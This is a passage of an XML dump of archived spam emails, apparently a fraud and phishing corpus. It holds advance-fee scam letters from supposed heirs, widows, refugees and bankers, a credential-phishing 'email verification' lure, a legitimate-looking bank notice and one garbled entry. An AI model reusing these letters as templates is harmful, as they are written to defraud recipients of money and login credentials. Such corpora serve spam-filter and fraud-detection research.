    <t>Thu, 21 Jul 2005 18:07:58 +0200</t>
  </si>
  <si>
    <t>Eloy Savimbi &lt;mohaelo2@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Thanks for your help.</t>
  </si>
  <si>
    <t>Hello Dear, \n\nThis letter may come to you as a surprise due to the fact that we have not yet met before.I managed to get your contact details through the internet myself, Time is of importance and I was desperately looking for a person to assist me in this confidential transaction.My movement and that of other members of my family has been highly restricted but happily i have been able to move out the Angola and is now in Senegal. \nI am Eloy Sakiata Savimbi,son of the late leader of Unita Rebel Jonas Savimbi of Angola who died on the 22nd February2002.([URL]http://www.empereur.com[/URL] \nBefore the death of my father he deposited the sum of USD15,000,000.00(fifteen million united states dollars) in a private security trust compnay for safe keeping only.All the related documents are intact with me and i have contacted the company .I am currently in Dakar Senegal as an asylum seeker pending when I get a foriegn partner because the monetary laws here which do not allow asylum seekers to operate any bank account. \nMUTUAL TRUST AND CONFIDENTIALITY \nBased on the above, I am contacting you so that you can help me invest this fund in your country hoping that you will remain trust worthy. \nThe fund was realised from gold and diamond sales when my late father was leading some region in our country.If you are ready I will give you all the information needed. \nPLEASE YOUR CONFIDENTIALITY IN THIS TRANSACTION IS HIGHLY REQUIRED. \nYours sincerely, \nEloy Savimbi \nNb= You can contact me on alternate Email is = (sakiataelo15@yahoo.com  )\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.empereur.com</t>
  </si>
  <si>
    <t>317</t>
  </si>
  <si>
    <t>To: mcabacha@freesurf.fr\nFrom: mcabacha@freesurf.fr\nDate: Thu, 21 Aug 2003 15:23:58 +0200</t>
  </si>
  <si>
    <t>Thu, 21 Aug 2003 15:23:58 +0200</t>
  </si>
  <si>
    <t>mcabacha@freesurf.fr</t>
  </si>
  <si>
    <t>OVER TURE</t>
  </si>
  <si>
    <t>Dear Sir,\n\nI am contacting you in view of the fact that we will be of great assistance\n\nto\n each other likewise developing a cordial business relationship. As I am\n interested in your kind of business and wishing to invest in your country.\n\n\n\nI am Mrs. Maryam Abacha, wife to the late Nigerian military Head of State.\n General Sanni Abacha who died on the 8th of June 1998 still in office due\nto\n\na\n protracted illness.\n\nI believe you must be aware of the recent face-off between my family and the\n\n\n present Civilian Government of President Olusegun Obasanjo who wants all my\n\n\n Late husbands foreign bank accounts and assets confiscated because of the\n monetary excesses of my la\n\n\nte husbands\nMilitary regime.\n\nCurrently, within my reach is the sum of twenty-three Million seven Hundred\n\n\n thousand United States Dollars (US$ 23,700,000.00) cash, which I intend to\n\nuse\n for investment purposes especially in your country. This huge sum of money\n\n\n came\n as result of a pay\n\n\nback contract\ndeal between my late husband and a Russian firm on our country's Multi\nbillion\n\n\n Dollar Ajaokuta Steel plant/complex. The Russian partners had since\nreturned\n\n\n my\n husband's share of US$23.7Million after his death and lodged it with a\n security\n firm.\n\nRight now the new Civilian Government have revoked all our licenses that\nallows\n\n\n us to own financial and oil companies and has frozen some of my late\nhusbands\n\n\n bank account in Switzerland and America.\n\nIn view of these I acted very fast to withdraw this US$23.7M from the\nsecurity\n\n\n company's vault well preserved and packaged in {1}trunk box and lodged in a\n\n\n private security firm OVERSEAS as Family Deposits (FD) No record ever\nexisted\n\n\n concerning the money\n\n\nneither is the money traceable by the Government because there is no\ndocuments\n\n\n showing that we received the money from the Russians.\n\nHowever, due to the current situation in the country concerning the present\n\n\n civilian Government hostile attitude towards my family, it has become quite\n\n\n impossible for me to make use of the money within the country. Thus I seek\n\n\n your\n assistance in moving t\n\n\nhis family Deposits (FD) into your account for safekeeping pending my\narrival\n\n\n in\n your country for investment purposes.\n\nOn your consent, I shall provide you with a POWER OF ATTORNEY to collect\nthis\n\n\n deposit with the security company OVERSEAS on our behalf. Bearing in mind\nthat\n\n\n your assistance is needed in this regards, I propose a commission of 20%\n (TWENTY PERCENT) of the\n\n\ntotal sum to you for the expected services and 10% for local and\ninternational expenses if any.\n\nYour urgent response is highly needed so as to start further contact .\nI therefore mandate Barrister GREG ADO who is our family Attorney to deal\n\n with\n you through out this transaction on my behalf.\n\nMay I at this point, emphasize the high level of confidentiality which this\n\n\n business demands whatever your decision and hope you will not betray the\ntrust\n\n\n and confidence which I repose in you.\n\nPlease don't forget to indicate your convenient phone and fax number where\nwe\n\n\n can always contact you.\n\nHowever, you may need to give me sufficient assurance that you will not sit\n\non\n this fund when it is finally remitted into your account. Please direct your\n\n\n reply of this mail to my family attorney,GREG ADO at gregado@rxpost.net and\n\ndiscuss with\n\n\nhim towards effective completion of this transaction.\n\nI believe I can trust you and I am willing to accept from you any useful and\n\n\n profitable investment proposal advice in your country. or reply me if my\n proposal interest you through my alternative email address:\nmcabacha@gawab.com\n\n\ns.\n\nRemain blessed.\n\nBest wishes,\nMrs. Maryam Abacha.\n\n\n\n\n----------------------------------------------------------------\nCe service de mailing vous est offert par [URL]http://www.freesurf.fr[/URL]\nFreeSurf, votre acces ADSL a partir de 29 euros/mois\n[URL]http://www.freesurf.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1263</t>
  </si>
  <si>
    <t>To: researchers-owner@krusty.si.UM\nFrom: researchers-owner@krusty.si.UM\nDate: Thu, 21 Apr 2005 15:08:32 -0400</t>
  </si>
  <si>
    <t>Thu, 21 Apr 2005 15:08:32 -0400</t>
  </si>
  <si>
    <t>Researchers post from wang@web-mail.com.ar requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Researchers@lists.si.UM\n    From:    wang@web-mail.com.ar\n    Subject: READ AND GET BACK\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>4457</t>
  </si>
  <si>
    <t>To: fma@zzzzason.org\nFrom: =?GB2312?B?yKvH8kVNQUlMtdjWt8/6ytvN+A==?= &lt;market@chinaemail.net&gt;\nDate: Thu, 20 Sep 2001 23:58:15 +0800</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 23:58:15 +0800</t>
  </si>
  <si>
    <t>=?GB2312?B?yKvH8kVNQUlMtdjWt8/6ytvN+A==?= &lt;market@chinaemail.net&gt;</t>
  </si>
  <si>
    <t>fma@zzzzason.org</t>
  </si>
  <si>
    <t>=?GB2312?B?NTDUqrvxtcPSu9LazuXHp83yRU1BSUy12Na3tcS7+rvh?=</t>
  </si>
  <si>
    <t>ã     t_x0001_u_x0001_1_x0004_ø_x0001_k¿~_x0002_     ª_x0004_µ_x0004_~_x0005_¹_x0001_ò_x0007_·_x0001_â_x0003_EMAILê_x0004_õ_x0003_     q_x0002_»_x0004_dîCNNIC2002µ25%?_x0001_{_x0003_ý_x0002_â_x0003_4_x0005_ª_x0003_EMAIL     EMAILê_x0004_ª_x0003_ú_x0006_µ_x0002_õ7_x0001_    +_x0002_EMAIL·_x0005_39_x0004_7_x0001_y_x0005_¹_x0001_ì8ª_x0003_{_x0003_i_x001E_l_x0003_     7_x0001_NÙ?ß{_x0003_020¡_x0002_:_x0004_u_x0003_     ã_x0003_&lt;_x0005_6_x0005_6_x0005_æ_x0002_º_x0006_ìh±_x0002_7_x0001_õ_x0001_~_x0005_     [URL]http://www.chinaemail.net[/URL]   á_x0003_                                                  +_x0002_EMAIL·_x0005_ 3_x0004_</t>
  </si>
  <si>
    <t>http://www.chinaemail.net</t>
  </si>
  <si>
    <t>368</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Admin" &lt;dmarin@giemme-stile.it&gt;\nDate: Thu, 20 Oct 2016 04:01:49 -0700</t>
  </si>
  <si>
    <t>Thu, 20 Oct 2016 04:01:49 -0700</t>
  </si>
  <si>
    <t>"Admin" &lt;dmarin@giemme-stile.it&gt;</t>
  </si>
  <si>
    <t>EMAIL VERIFICATION</t>
  </si>
  <si>
    <t>Hello &amp;email&amp;! Recently we received some notifications regarding your email account &amp;email&amp; which might be due to recent changes made in your email or irregular login attempts on your account.  We require you to add your email: &amp;email&amp; to our secured database in order to ensure high end distribution of full account safety for present and future means.  To complete the process, please click on the button to verify your email address.  Proceed with Verification    If a verification response is not received in the next 48 hours it may create more vulnerability to your email threats and ability to access your Email account would be restricted permanently from our database.  Email Administrator Inc.   Email Security Administrator Inc. All Rights Reserved © 2016  Avviso Questa casella di posta elettronica è riservata esclusivamente all'invio ed alla ricezione di messaggi aziendali inerenti all'attività lavorativa, quindi non è previsto ne' autorizzato il suo utilizzo per fini personali. I messaggi in uscita e in entrata sono soggetti alla ordinaria gestione prescritta nel disciplinare adottato dall'azienda, il quale prevede la lettura da parte di persone  diverse dall'intestatario nominale della casella.  Warning       The mail box you are addressing to is exclusively reserved to company's business mail messages. Personal use is not foreseen nor authorized.    Incoming and outcoming mail messages are subject to our company's internal code of practice, which allows readers besides  the intended recipients. GieMme Stile SpA -Via del Torrione, 16 - 36060 Romano d'Ezzelino (Vicenza) Italy Ph. +39 0424 83 26 00 - Fax +39 0424 83 26 66 - [URL]http://www.francescomolon.com[/URL] - email: info@francescomolon.com  Cap.Soc.Euro 4.000.000,00 i.v. - Iscr.Reg.Imprese VI 02033690245 - Iscr. R.E.A. n.201388  Cod.Fisc. e P.IVA 02033690245 - Iden CEE02033690245 Hello &amp;email&amp;!Recently we received some notifications regarding your email account &amp;email&amp; which might be due to recent changes made in your email or irregular login attempts on your account. We require you to add your email: &amp;email&amp; to our secured database in order to ensure high end distribution of full account safety for present and future means. To complete the process, please click on the button to verify your email address. Proceed with Verification   If a verification response is not received in the next 48 hours it may create more vulnerability to your email threats and ability to access your Email account would be restricted permanently from our database. Email Administrator Inc. Email Security Administrator Inc. All Rights Reserved © 2016    Avviso Questa casella di posta elettronica è riservata esclusivamente all'invio ed alla ricezione di messaggi aziendali inerenti all'attività lavorativa, quindi non è previsto ne' autorizzato il suo utilizzo per fini personali. I messaggi in uscita e in entrata sono soggetti alla ordinaria gestione prescritta nel disciplinare adottato dall'azienda, il quale prevede la lettura da parte di persone  diverse dall'intestatario nominale della casella.  Warning       The mail box you are addressing to is exclusively reserved to company's business mail messages. Personal use is not foreseen nor authorized.    Incoming and outcoming mail messages are subject to our company's internal code of practice, which allows readers besides  the intended recipients. GieMme Stile SpA -Via del Torrione, 16 - 36060 Romano d'Ezzelino (Vicenza) Italy Ph. +39 0424 83 26 00 - Fax +39 0424 83 26 66 - [URL]http://www.francescomolon.com[/URL] - email: info@francescomolon.com  Cap.Soc.Euro 4.000.000,00 i.v. - Iscr.Reg.Imprese VI 02033690245 - Iscr. R.E.A. n.201388  Cod.Fisc. e P.IVA 02033690245 - Iden CEE02033690245</t>
  </si>
  <si>
    <t>http://www.francescomolon.com http://www.francescomolon.com</t>
  </si>
  <si>
    <t>632</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: "Capital One Investing" &lt;investor@email.capitaloneinvesting.com&gt;\nDate: Thu, 20 Jul 2017 12:31:28 -0600</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2017 12:31:28 -0600</t>
  </si>
  <si>
    <t>"Capital One Investing" &lt;investor@email.capitaloneinvesting.com&gt;</t>
  </si>
  <si>
    <t>Enhanced account security is coming</t>
  </si>
  <si>
    <t>------------------------------ We're kicking security up a notch. ------------------------------ Account Number: XXXXXXX042 Account Type: Individual Dear Jose,  We're always working to make your Capital One InvestingSM online account as secure as we can. Soon, we'll be adding enhanced online security-and we want you to know what to expect. What's new. Occasionally when you sign in to your account, you may see an identity verification screen as an added layer of protection; that means you'll need to confirm your identity with a security code that we'll email you upon request. Simply go to your email to get your unique security code, then enter that code on the website to let us know it's really you accessing your account. Why. This enhanced, two-factor authentication will help protect you against fraud, unauthorized account access and identity theft. Check out our FAQs([URL]https://www.capitaloneinvesting.com[/URL] to learn more. What you can do. It's important to maintain a current email for your account so this enhanced security can work. If this isn't the best email address for you, sign in([URL]https://www.capitaloneinvesting.com[/URL] to your account and make sure your contact information is up-to-date. Sincerely,   The Capital One Investing Team ----------------------------- Follow us! Facebook: [URL]http://click-email.capitaloneinvesting.com[/URL] Twitter: [URL]http://click-email.capitaloneinvesting.com[/URL] Privacy Policy: [URL]http://click-email.capitaloneinvesting.com[/URL] Email Security: [URL]http://click-email.capitaloneinvesting.com[/URL] Capital One Investing and its service providers are committed to protecting your privacy and ask you not to send sensitive account information through email. If you are not a Capital One Investing customer, or believe you received this message in error, please notify us at customerservice@capitaloneinvesting.com.  Investment products are offered by Capital One Investing, LLC, a registered broker-dealer and Member FINRA ([URL]http://www.finra.org[/URL] SIPC ([URL]http://www.sipc.org[/URL] Investment advisory services are provided by Capital One Advisors, LLC, an SEC-registered investment advisor. Insurance products are offered through Capital One Agency, LLC. All are subsidiaries of Capital One Financial Corporation.  This email was sent to jose@monkey.org and contains information directly related to your account with us, other services to which you have subscribed, and/or any application you may have submitted. (c) 2017 Capital One. Capital One and ShareBuilder are federally registered service marks. All third-party trademarks are the property of their respective owners. Capital One Investing, LLC | PO Box 259008 | Plano, TX 75025 Enhanced account security is coming   To view this email as a web page, click here. Sign In We're kicking security up a notch. Account Number: XXXXXXX042               			Account Type: Individual 										 Dear Jose,  										 We're always working to make your Capital One InvestingSM online account as secure as we can. Soon, we'll be adding enhanced online security—and we want you to know what to expect. 										 What's new. Occasionally when you sign in to your account, you may see an identity verification screen as an added layer of protection; that means you'll need to confirm your identity with a security code that we'll email you upon request. Simply go to your email to get your unique security code, then enter that code on the website to let us know it's really you accessing your account. 										 Why. This enhanced, two-factor authentication will help protect you against fraud, unauthorized account access and identity theft. Check out our FAQs to learn more. 										 What you can do. It's important to maintain a current email for your account so this enhanced security can work. If this isn't the best email address for you, sign in to your account and make sure your contact information is up-to-date. 										 					 Sincerely, 					The Capital One Investing Team 					 					 Follow us! Privacy Policy | Email Security 						Capital One Investing and its service providers are committed to protecting your privacy and ask you not to send sensitive account information through email. If you are not a Capital One Investing customer, or believe you received this message in error, please notify us at customerservice@capitaloneinvesting.com.  						 						Investment products are offered by Capital One Investing, LLC, a registered broker-dealer and Member FINRA/SIPC. Investment advisory services are provided by Capital One Advisors, LLC, an SEC-registered investment advisor. Insurance products are offered through Capital One Agency, LLC.  						 						All are subsidiaries of Capital One Financial Corporation. 						 						This email was sent to jose@monkey.org and contains information directly related to your account with us, other services to which you have subscribed, and/or any application you may have submitted. 						 © 2017 Capital One. Capital One and ShareBuilder are federally registered service marks. All third-party trademarks are the property of their respective owners. 						 						Capital One Investing, LLC | PO Box 259008 | Plano, TX 75025</t>
  </si>
  <si>
    <t>https://www.capitaloneinvesting.com https://www.capitaloneinvesting.com http://click-email.capitaloneinvesting.com http://click-email.capitaloneinvesting.com http://click-email.capitaloneinvesting.com http://click-email.capitaloneinvesting.com http://www.finra.org http://www.sipc.org</t>
  </si>
  <si>
    <t>2360</t>
  </si>
  <si>
    <t>To: nan\nFrom: Rebecca Hasan &lt;rebhas2006@srp.ac.th&gt;\nDate: Thu, 20 Jul 2006 20:51:51 +0700</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2006 20:51:51 +0700</t>
  </si>
  <si>
    <t>Rebecca Hasan &lt;rebhas2006@srp.ac.th&gt;</t>
  </si>
  <si>
    <t>"MY GOOD WILL"</t>
  </si>
  <si>
    <t xml:space="preserve"> "MY GOOD WILL"\n\nGood day and God bless,\n\nGreetings to you in the name of God Almighty. I am former Mrs. Memunat Farouk Hasan, now I am Mrs. Rebecca Farouk Hasan a widow to Late Farouk Hasan Muhammad.\n\nI am an old woman; suffering from cancer. From all indications, my condition is really deteriorating and is quite obvious that I may not live long, because the cancer stage has gotten to a very severe stage. My late husband died in an air crash on the 31st October 1999 in an Egyptian airline Boeing 990 with other passengers on board. You can confirm this fact from the website which was aired by the BBC WORLD NEWS:([URL]http://news.bbc.co.uk[/URL] and my only daughter died in BOMB ATTACK LONDON.\n\nMy late husband was very wealthy and after his death, I inherited all his business and wealth. My personal physician told me that I may not live for so long and I am so scared about this. So, I now decided to divide part of this wealth, by contributing to the well being of less privileged people and handicapped in the society of world America, Canada, Africa, Europe and Asian Countries.\n\nThis mission, who will no doubt be tasking had made me to recently\nrelocate to Africa where I live presently. I selected you for this Purpose and prayed over it, I am willing to donate the sum of $7,300,000.00 Million US Dollars to you for the development of the well being of handicapped in the society and also as aids for the less privileged around your country, and i have map out $1,700.000.00 for your own personal use to help me for this work. \n\nPlease note that, this fund is lying in a Security Bank. Therefore immediate application for the transfer of the money in your name or your home. Please, do not reply me if you have the intention of using this fund for personal use, than enhancement of the comfort of the Handicapped.\n\nLastly, I want you/your home to be praying for me as regards my entire life and my health because I have come to find out since my spiritual birth lately that wealth acquisition without God one's life is vanity upon vanity.\n\nI await your reply.\nMRS REBECCA HASAN \nPrivate Email: rebhas2006@list.ru\n\n\n</t>
  </si>
  <si>
    <t>2363</t>
  </si>
  <si>
    <t>To: nan\nFrom: ms_mariasakim@ozu.es\nDate: Thu, 20 Jul 2006 19:15:03 +0200</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2006 19:15:03 +0200</t>
  </si>
  <si>
    <t>ms_mariasakim@ozu.es</t>
  </si>
  <si>
    <t>Dear One, I Am(Ms.Maria Sara Akim)From refugee camp ,      Get Back Is Urgently Needed</t>
  </si>
  <si>
    <t>\n\nFrom:Ms.Maria Sara Akim.\nI Am A Liberia. But Am In refugee camp.\nAbidja Cote D' Ivoire\nEmail:maria_sakim@yahoo.fr\n\n\n                               Confidential\nDear One:\n\nI am a girl of 19 years old my name is (Ms.Maria Sara Akim ).the only\nduther/child of (Dr Dickson Akim Gift),fromliberia. I am an orhpan being\nthat I lost my parents a couple of years ago\nduring the last war in liberia.and now i am here in Abidjan cote d ivoire\nat the refugee camp again in my life due to the political uprising here in\nCote d'Ivoire.\n\nThe death of my farther has exposing me to danger.\n\nMy late Father was a serving director of the Cocoa exporting board until\nhis death .both my father and mother was killed during the last rebels war\nin my conutry liberia.But before there death My father (Dr Dickson Akim\nGift),  revealed to me that he deposited the sum of ($12.5 Million US\nDollars) in  a bank here in abidjan cote d'ivoire which he wrote on how he\ndeposited the money on it he said it is for importation of cocoa\nprocessing machine and i will like to invest the money to your country.\n\nThe money was deposited by my late father name on which he did not declear\nany name as his foreign partner/beneficiary to the bank with this i want\nyou to stand as his foreign partner/beneficiary, for the bank here to use\nyour name to transfer the money out from Abidjan Cote D'Ivoire due to the\npolitical war here.I want you to do me a favour to receive this funds to a\nsafe account in  your country or any safer place as the foreign\npartner/beneficiary I have plans to do  investment in your country, like\nreal estate houses and private school  or  importation of raw materials.\n\nYou will help me Get a visa to your country for residence in order for us\nto continue invest the fund in a viable business venture and you will also\nget a school for me, so that i will finish my\neducation there.If you are willing to assist me, please let me know\nimmediately and provide your following information below:\n\n_House/address...........\n_Your Telephone................\n_State Country.....................\n\nUpon your assistance out of the 100% of the money we will share\n45%,45%,and 10% will be for any expencess all i need from your is honesty\nand you will promise me that you will not run away with my\nfather's money.\n\nI will send to you all the documentation that prove the source of  the\nfund  before the transfer.\nYour earliest response to this letter will be appreciated.I require you to\ntreat this letter with the utmost urgency.If you are not interested,please\ndelete this letter so that I can scout for another competent partner to\nconclude this transaction.\n\nThank's and best regards.\nMs.Maria Sara Akim.\n\n\n\n\n\n--------------------------------------------------------------------------------------------\nNueva Barra de Herramientas de OZÚ. Navega Más facilmente por Internet.\n¡Descargatela gratis! [URL]http://barra.ozu.es[/URL]\n--------------------------------------------------------------------------------------------\nCorreo enviado desde [URL]http://www.ozu.es[/URL]\n\n\n</t>
  </si>
  <si>
    <t>2362</t>
  </si>
  <si>
    <t>To: nan\nFrom: gabriel baki &lt;gabriel_baki07@hotmail.fr&gt;\nDate: Thu, 20 Jul 2006 17:19:06 +0200</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2006 17:19:06 +0200</t>
  </si>
  <si>
    <t>gabriel baki &lt;gabriel_baki07@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM GABRIEL BAKI,\nCOCODY-RIVIERA II\nABIDJAN,COTE D'IVOIRE\nGOOD DAY\n\nIN ORDER TO TRANSFER OUT (USD 45.000.000.00 MILLION DOLLARS) FROM OUR BANK. \nI HAVE THE COURAGE TO ASK YOU TO LOOK FOR A RELIABLE AND HONEST PERSON WHO \nWILL BE CAPABLE FOR THIS IMPORTANT BUSINESS BELIEVING THAT YOU WILL NEVER \nLET ME DOWN EITHER NOW OR IN FUTURE.\n\nI AM, GABRIEL BAKI .THE EASTERN DISTRICT BANK MANAGER OF ONE OF BANK HERE IN \nCOTE D IVOIRE. THERE IS AN ACCOUNT OPENED IN THIS BANK IN 1980 AND SINCE \n1990 NOBODY HAS OPERATED ON THIS ACCOUNT AGAIN. AFTER GOING THROUGH SOME OLD \nFILES IN THE RECORDS I DISCOVERED THAT IF I DO NOT REMITT THIS MONEY OUT \nURGENTLY IT WILL BE FORFEITED FOR NOTHING.\n\nTHE OWNER OF THIS ACCOUNT IS MR. SMITH B. ANDREAS, A FOREIGNER, AND THE \nMANAGER OF PETRO - TECHNICAL SUPPORT SERVICES, A CHEMICAL ENGINEER BY \nPROFESSION AND HE DIED SINCE 1990. NO OTHER PERSON KNOWS ABOUT THIS ACCOUNT \nOR ANY THING CONCERNING IT, THE ACCOUNT HAS NO OTHER BENEFICIARY AND MY \nINVESTIGATION PROVED TO ME AS WELL THAT THIS COMPANY DOES NOT KNOW NYTHING \nABOUT THIS ACCOUNT AND THE AMOUNT INVOLVED IS (USD 45000.000.00 MILLION \nDOLLARS).\n\nI WANT TO TRANSFER THIS MONEY INTO A SAFE FOREIGNERS ACCOUNT ABROAD BUT I \nDON'T KNOW ANY FOREIGNER, I AM ONLY CONTACTING YOU AS A FOREIGNER BECAUSE \nTHIS MONEY CAN NOT BE APPROVED TO A LOCAL BANK HERE, BUT CAN ONLY BE \nAPPROVED TO ANY FOREIGN ACCOUNT BECAUSE THE MONEY IS IN US DOLLARS AND THE \nFORMER OWNER OF THE ACCOUNT IS MR. SMITH B. ANDREAS IS A FOREIGNER TOO.\n\nI KNOW THAT THIS MASSAGE WILL COME TO YOU AS A URPRISE AS WE DON'T KNOW OUR \nSELVES BEFORE, BUT BE SURE THAT IT IS REAL AND A GENUINE BUSINESS. I ONLY \nGOT YOUR CONTACT ADDRESS FROM THE COMPUTER WITH BELIEVE IN GOD THAT YOU WILL \nNEVER LET ME DOWN IN THIS BUSINESS YOU ARE THE ONLY PERSON THAT I HAVE \nCONTACTED IN THIS BUSINESS, SO PLEASE REPLY URGENTLY SO THAT I WILL INFORM \nYOU THE NEXT STEP TO TAKE URGENTLY.\n\nI WANT US TO SEE FACE TO FACE OR SIGN A BINDING AGREEMENT TO BIND US \nTOGETHER SO THAT YOU CANRECIEVE THIS MONEY INTO A FORIEGN ACCOUNT OR ANY \nACCOUNT OF YOUR CHOICE WHERE THE FUND WILL BE REMMITTED. AND I WILL FLY TO \nYOUR COUNTRY FOR WITHDRAWAL AND SHARING AND OTHER INVESTMENTS.\n\nI AM CONTACTING YOU BECAUSE OF THE NEED TO INVOLVE A FOREIGNER WITH FOREIGN \nACCOUNT AND FOREIGN BENEFICIARY. BECAUSE THE MANAGEMENT IS READY TO APPROVE \nTHIS PAYMENT TO ANY FOREIGNER WHO HAS CORRECT INFORMATION OF THIS ACCOUNT, \nWHICH I WILL GIVE TO YOU LATER IMMEDIATELY, IF YOU ARE ABLE AND WITH \nCAPABILITY TO HANDLE SUCH AMOUNT IN STRICT CONFIDENCE AND TRUST ACCORDING TO \nMY INSTRUCTIONS AND ADVICE FOR OUR MUTUAL BENEFIT BECAUSE THIS OPPORTUNITY \nWILL NEVER COME AGAIN IN MY LIFE.\n\nA NEED TRUTHFUL PERSON IN THIS BUSINESS BECAUSE I DON'T WANT TO MAKE MISTAKE \nI NEED YOUR STRONG ASSURANCE AND TRUST. WITH MY POSITION NOW IN THE OFFICE I \nCAN TRANSFER THIS MONEY TO ANY FOREIGNERS RELIABLE ACCOUNT WHICH YOU CAN \nPROVIDE WITH ASSURANCE THAT THIS MONEY WILL BE INTACT PENDING MY PHYSICAL \nARRIVAL IN YOUR COUNTRY FOR SHARING.\nI WILL DESTROY ALL DOCUMENTS OF TRANSACTION IMMEDIATELY WE RECIEVE THIS \nMONEY LEAVING NO TRACE TO ANY PLACE. YOU CAN ALSO COME TO DISCUSS WITH ME \nFACE TO FACE AFTER WHICH I WILL MAKE THIS REMITTANCE IN YOUR PRESENCE AND \nTWO OF US WILL FLY TO YOUR COUNTRY AT LEAST TWO DAYS AHEAD OF THE MONEY \nGOING INTO YOUR ACCOUNT. I WILL APPLY FOR ANNUAL LEAVE TO GET VISA \nIMMEDIATELY I HEAR FROM YOU THAT YOU ARE READY TO ACT AND RECEIVE THIS FUND \nIN YOUR ACCOUNT.\n\nI WILL USE MY POSITION AND INFLUENCE TO EFFECT LEGAL APPROVALS AND ONWARD \nTRANSFER OF THIS MONEY TO YOUR ACCOUNT WITH APPROPRIATE CLEARANCE FORMS OF \nTHE MINISTRIES AND FOREIGN EXCHANGE DEPARTMENTS.\nAT THE CONCLUSION OF THIS BUSINESS, YOU WILL BE GIVEN 20% OF THE TOTAL \nAMOUNT, 75% WILL BE FOR ME, WHILE 5% WILL BE FOR EXPENSES BOTH PARTIES MIGHT \nHAVE INCURED DURING THE PROCESS OF TRANSFERING.\nI LOOK FORWARD TO YOUR EARLIEST.\n\nYOURS TRULY,\nGABRIEL\n\n_________________________________________________________________\nRetrouvez tout en un clin d'oeil avec la barre d'outil MSN Search ! \n[URL]http://desktop.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2359</t>
  </si>
  <si>
    <t>To: linda_kokori@latinmail.com &lt;linda_kokori@latinmail.com&gt;\nFrom: linda kokori &lt;linda_kokori@latinmail.com&gt;\nDate: Thu, 20 Jul 2006 13:32:40 +0200</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2006 13:32:40 +0200</t>
  </si>
  <si>
    <t>linda kokori &lt;linda_kokori@latinmail.com&gt;</t>
  </si>
  <si>
    <t>linda_kokori@latinmail.com &lt;linda_kokori@latinmail.com&gt;</t>
  </si>
  <si>
    <t>((contact Mrs Linda))</t>
  </si>
  <si>
    <t>FROM MRS LINDA KOKORI \nABIDJAN IVORY COAST \nTELEPHONE 0022507663185 \nATTN. \nMY NAME IS MRS.LINDA KOKORI  . I AM A WIDOW AND A MOTHER OF A BOY WITHOUT A FEMALE  CHILD. I KNOW YOU WILL SEE MY LETTER TO YOU AS ANEMBARRASSMENT CONSIDERING THE FACT THAT WE DO NOT KNOW OURSELVES. I PLEAD WITH YOU TO BE PATIENT WITH ME AND GIVE ME AUDIENCE BECAUSE I FOUND MYSELF IN A SITUATION THAT I DONT HAVE ANY OPTION THAN TO CONTACT YOU,SO THAT YOU CAN HELP ME IN THIS PROBLEM I FOUND MYSELF INTO, SO I FEEL VERY PLEASED TO CONTACT YOU FOR YOUR ASSISTANCE AND BUSINESS RELATIONSHIP  FOR THE INVESTING IN YOUR COUNTRY THE SUM OF $18.3MILLION USD WHICH MY LATE HUSBAND LEFT WITH A BANK HERE IN ABIDJAN BEFORE HIS DEATH.\n IF YOUR INTERESTED TO HELP IN THE INVESTMENT CONTACT IMMEDIATLY \nI AM HOPING TO HEAR FROM YOU.\nMRS LINDA KOKORI\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2006</t>
  </si>
  <si>
    <t>To: nan\nFrom: princessmemuna iboudo &lt;princessmemuna_iboudo80@hotmail.com&gt;\nDate: Thu, 20 Apr 2006 10:33:55 +0000</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2006 10:33:55 +0000</t>
  </si>
  <si>
    <t>princessmemuna iboudo &lt;princessmemuna_iboudo80@hotmail.com&gt;</t>
  </si>
  <si>
    <t>PLEASE REPLY BACK</t>
  </si>
  <si>
    <t>HELLO FRIEND,\nGood day and Compliments, I am writing this letter in confidence believing \nthat if it is the wish of God for you to help me and my family, God Almighty \nwill bless and reward you abundantly and you\nwould never regret this.\nMy family and I are true Christians and worship God truthfully. I got your \ncontact during my search for this assistance. I am a female student from \nUniversity Burkina Faso, Ouaga. I am 22 yrs old. I'd like any person who can \nbe caring, loving and home oriented. I will love to havea long-term \nrelationship with you and to know more about you.\nI would like to build up a solid foundation with you in time coming if you \ncan be able to help me in this transaction. Well, my father died earlier \nthree months ago and left I and my junior brother behind. Hewas a king, \nwhich our town citizens titled him over sixteen years before\nhis death.\nI was a princess to him and I am the only person who can take care of his \nwealth now because my junior brother is still young and my mother is not \nliterate enough to know my entire father's wealth.He left the sum of USD \n7.350, 000M (Seven Million, Three Hundred and Fifty\nThousand US Dollars) in a security company.\nThis money was annually paid into my late fathers account from Shell \npetroleum Development Company (spdc) and chevron Oil Company operating in \nour locality for the compensation of youth and community development in our \njurisdiction.\nI don't know how and what I will do to invest this money somewhere in \nabroad, so that my father's kindred will not take over what belongs to my \nfather and our family, which they were planning to do without my \nconsentbecause I am a female as stated by our culture in the town.\nNow, I urgently need your humble assistance to move this money from the  \nSecurity Company to your bank account that is why I felt happy when I saw \nyour contact because I strongly believe that by the grace of God,you will \nhelp me invest this money wisely.\nI am ready to pay 30% of the total amount to you if you help us in this \ntransaction and another 10% interest of Annual after Income to you, for \nhandling this transaction for us, which you will strongly have absolute \ncontrol over it.\nIf you can handle this project sincerely and also willing to assist me in \nlifting this fund, kindly reach me. Please, note that this transaction is \n100% risk free and I hope to commence the transaction as quick as possible, \nI will send you my picture as soon as I hear from you for recognition.\nYours sincerely,\nPrincess memuna iboudo.\nplease reply me at my private email address: \nprincessmemuna_iboudo@hotmail.com\n\n_________________________________________________________________\nMSN Messenger: appels gratuits de PC  PC ! 